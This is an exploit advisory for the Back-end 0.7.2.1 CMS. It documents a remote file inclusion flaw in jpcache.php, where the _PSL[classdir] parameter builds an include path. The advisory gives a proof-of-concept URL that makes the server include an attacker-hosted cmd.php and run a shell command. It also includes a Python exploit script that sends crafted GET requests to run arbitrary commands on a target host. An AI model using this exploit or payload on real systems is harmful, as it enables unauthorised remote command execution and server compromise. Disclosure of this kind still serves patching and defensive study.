/ Federico Fazzi, */ Back-end = 0.7.2.1 (jpcache.php) Remote command execution */ 08/06/2006 1:04 Bug: jpcache.php: line 40 --- $includedir = $_PSL['classdir'] . "/jpcache"; --- Proof of concept: Back-end have a default path pre-set on jpcache.php, and cracker can execute a remote command. http://example/[be_path]/class/jpcache/jpcache.php?_PSL[classdir]=http://example/cmd.php?exec=uname you can use too the exploit f_mg-2.62.py #!/usr/bin/env python # # Back-end = 0.7.2.1 (jpcache.php) Remote command execution # vendor, http://www.back-end.org/ # # python f_be-0.7.2.1.py # # Federico Fazzi # more info see advisory. import os, sys, socket usage = "run: python %s [remote_addr] [remote_port] [remote_path] [remote_cmd] " % os.path.basename(sys.argv[0]) if len(sys.argv) < 6: print usage sys.exit() else: host = sys.argv[1] port = int(sys.argv[2]) path = sys.argv[3] cmd = sys.argv[4] command = sys.argv[5] print "Back-end = 0.7.2.1 (jpcache.php) Remote command execution" print "Federico Fazzi \n" includers = ['class/jpcache/jpcache.php?_PSL[classdir]='] for inc in includers: print ">> i try string %s" % inc sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host, port)) sock.send("GET %s%s%s?cmd=%s \r\n" % (path, inc, cmd, command)) print "\n>> reading.. done\n" buf = sock.recv(2048) print buf